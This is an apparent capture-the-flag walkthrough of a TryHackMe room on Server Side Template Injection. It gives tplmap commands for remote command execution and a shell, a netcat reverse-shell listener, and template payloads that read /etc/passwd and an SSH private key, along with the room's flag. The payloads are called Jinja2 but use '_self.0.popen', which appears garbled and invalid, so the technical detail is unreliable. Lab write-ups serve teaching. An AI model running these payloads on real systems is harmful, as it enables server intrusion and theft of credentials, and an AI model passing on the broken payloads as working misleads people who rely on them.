Introduction

In this walkthrough, we covered manual and automatic methods to detect Server Side Template Injection or SSTI. We used ZTH: Obscure Web Vulns room from TryHackMe .

SSTI or Server Side Template Injection

First off, what exactly is SSTI? I learned that it’s a vulnerability that can occur when a web application uses a template engine to generate dynamic content, but it doesn’t properly sanitize the user’s input. This means that if you can inject code into the template, the server will execute it. Think of it like this: if a website is building a page using a template and it takes your name to display a friendly “Hello, [Your Name]!”, an SSTI vulnerability would allow you to insert code instead of your name, and the server would run it.

I found that this type of vulnerability is common in applications like wikis, blogs, and content management systems. A great way to test for it is to use a simple arithmetic expression like {{2+2}}. If the website displays “4” instead of “{{2+2}}”, you’ve likely found an SSTI vulnerability. For anyone wanting to dig deeper, I highly recommend checking out the articles on PortSwigger’s website.

Putting Theory into Practice

I found a web application to test my newfound knowledge. It had a simple input box that asked, “What is two plus two?”. When I typed “4”, it confirmed the correct answer. By looking at the page source, I could see that my input was being taken and displayed back to me. This was the perfect place to try out some SSTI payloads.

Automatic Exploitation with TPLMap

To start, I decided to use a tool called TPLMap, which is designed specifically for finding and exploiting SSTI. It’s a powerful tool that can automate the entire process.

I ran TPLMap against the vulnerable URL and pointed it to the parameter I suspected was vulnerable. The tool quickly confirmed that the application was using the Jinja2 template engine and that it was indeed vulnerable. TPLMap even showed me that I could get a shell on the server!

To test this, I used TPLMap to execute the id command on the server, and it worked perfectly, showing me the user ID. Next, I set up a Netcat listener on my own machine and used TPLMap to get a reverse shell, giving me direct command-line access to the server.

Manual Exploitation

After seeing how easy it was with a tool, I wanted to try exploiting the vulnerability manually. I went back to the web application and entered {{2+2}} into the input box. As expected, the page returned “4”.

I then tried a more advanced payload to see if I could read files from the server. I used a payload designed to execute commands and read the /etc/passwd file. It worked! The contents of the file were displayed right there on the web page. I also tried to read an SSH private key, but that attempt resulted in an error.

The Final Challenge

The video I was following concluded with a challenge: find a flag located at /flag on the server. I decided to try both my automatic and manual methods.

First, I used TPLMap with a command to read the /flag file. It immediately returned the flag: “cocktails“.

Then, for the manual approach, I used my file-reading payload and simply replaced /etc/passwd with /flag. And just like that, the flag “cocktails” was displayed on the page.

Technical Commands Used

Here are the technical commands I used on the terminal during this process:

  • python2 tplmap.py -u <URL> -d name
    • This command runs TPLMap to test a URL for SSTI, specifying the vulnerable parameter with the -d flag.
  • python2 tplmap.py -u <URL> -d name --os-cmd id
    • This command uses TPLMap to execute the id command on the target server.
  • nc -lvp 4545
    • This sets up a Netcat listener on port 4545, waiting for an incoming connection (like a reverse shell).
  • python2 tplmap.py -u <URL> -d name --os-shell
    • This command instructs TPLMap to attempt to establish a reverse shell to a specified IP and port.
  • python2 tplmap.py -u <URL> -d name --os-cmd "cat /etc/passwd"
    • This command uses TPLMap to read the /etc/passwd file from the server.
  • {{_self.0.popen('cat /etc/passwd').read()}}
    • This is a manual SSTI payload for Jinja2 that executes the cat /etc/passwd command and displays the output.
  • {{_self.0.popen('cat /home/test/.ssh/id_rsa').read()}}
    • A manual payload to attempt to read an SSH private key.
  • python2 tplmap.py -u <URL> -d name --os-cmd "cat /flag"
    • The TPLMap command used to automatically find and display the challenge flag.
  • {{_self.0.popen('cat /flag').read()}}
    • The manual payload used to find and display the challenge flag.

Room Answers

What is the flag?

Video Walk-through

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles